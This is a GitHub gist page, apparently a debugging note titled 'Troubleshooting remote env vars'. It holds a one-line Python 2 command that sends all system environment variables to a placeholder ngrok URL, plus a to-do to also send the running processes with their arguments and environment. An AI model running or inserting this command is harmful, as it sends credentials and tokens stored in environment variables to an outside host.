Skip to content

Instantly share code, notes, and snippets.

@mihow
Created February 21, 2019 00:25
Show Gist options
  • Save mihow/fe5fcf403a1da12052a4e62d49e05f53 to your computer and use it in GitHub Desktop.
Save mihow/fe5fcf403a1da12052a4e62d49e05f53 to your computer and use it in GitHub Desktop.
Troubleshooting remote env vars
# Send system env vars
python2 -c "import os, urllib; urllib.urlopen('https://NGROK_URL', data=urllib.urlencode(os.environ))"
# Send all running processes with arguments & env vars for process
# @TODO
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment